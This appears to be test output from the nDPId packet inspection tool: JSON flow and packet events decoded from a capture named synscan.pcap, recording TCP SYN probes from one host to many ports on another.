-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsVxkAACcGylmsEAAIQA2GNIzSF3TdUoMYAAAAAGACEAARGwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsbJ8AADoGodOsEAAIQA2GNIzSBCHdUoMYAAAAAGACDAAobgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1743,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsE7MAACUGD8CsEAAIQA2GNIzSD0rdUoMYAAAAAGACCAAhRQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAszqgAACUGVMqsEAAIQA2GNIzS\/23dUoMYAAAAAGACCAAxIQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYwAACsGj+asEAAIQA2GNIzSGWbdUoMYAAAAAGACEAAPKQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1746,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAse1IAADMGmiCsEAAIQA2GNIzSQmHdUoMYAAAAAGACEADmLQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061052,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_packet_id":1,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061052,"pkt":"ACYLMQczACWzv5HuCABFAAAscwEAAC4Gp3GsEAAIQA2GNIzSBH3dUoMYAAAAAGACDAAoEgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs3eAAACwGPpKsEAAIQA2GNIzTBEHdU4MZAAAAAGACBAAwSwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30951,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1749,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+toAACwGIZisEAAIQA2GNIzTeOfdU4MZAAAAAGACBAC7pAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAscqoAADUGoMisEAAIQA2GNIzTB9rdU4MZAAAAAGACCAAosgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX4AAC0G2fSsEAAIQA2GNIzTG7\/dU4MZAAAAAGACCAAUzQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJYAADcGvNysEAAIQA2GNIzTGgvdU4MZAAAAAGACEAAOgQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAs+30AADAGHPWsEAAIQA2GNIzTTv3dU4MZAAAAAGACBADljgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1754,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRoAAC4GpVisEAAIQA2GNIzTDIvdU4MZAAAAAGACDAAgAQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061055,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_packet_id":1,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061055,"pkt":"ACYLMQczACWzv5HuCABFAAAsb7MAAC0Gq7+sEAAIQA2GNIzTAbzdU4MZAAAAAGACCAAu0AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAs3jwAADYGNDasEAAIQA2GNIzTFO3dU4MZAAAAAGACDAAXnwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1757,"flow_packet_id":1,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061071,"pkt":"ACYLMQczACWzv5HuCABFAAAsrI8AADoGYeOsEAAIQA2GNIzTC17dU4MZAAAAAGACDAAhLgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1758,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs0rwAAC8GRrasEAAIQA2GNIzTEOHdU4MZAAAAAGACEAAXqwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsBRoAAC0GFlmsEAAIQA2GNIzTHOrdU4MZAAAAAGACCAATogAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsYVAAADMGtCKsEAAIQA2GNIzTFgHdU4MZAAAAAGACEAASiwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CgAAC4GLkqsEAAIQA2GNIzTC73dU4MZAAAAAGACDAAgzwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsAbcAACoGHLysEAAIQA2GNIzTF3bdU4MZAAAAAGACDAAVFgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs5SoAADkGKkisEAAIQA2GNIzTBDjdU4MZAAAAAGACCAAsVAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs+G4AAC4GIgSsEAAIQA2GNIzTB9bdU4MZAAAAAGACDAAktgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
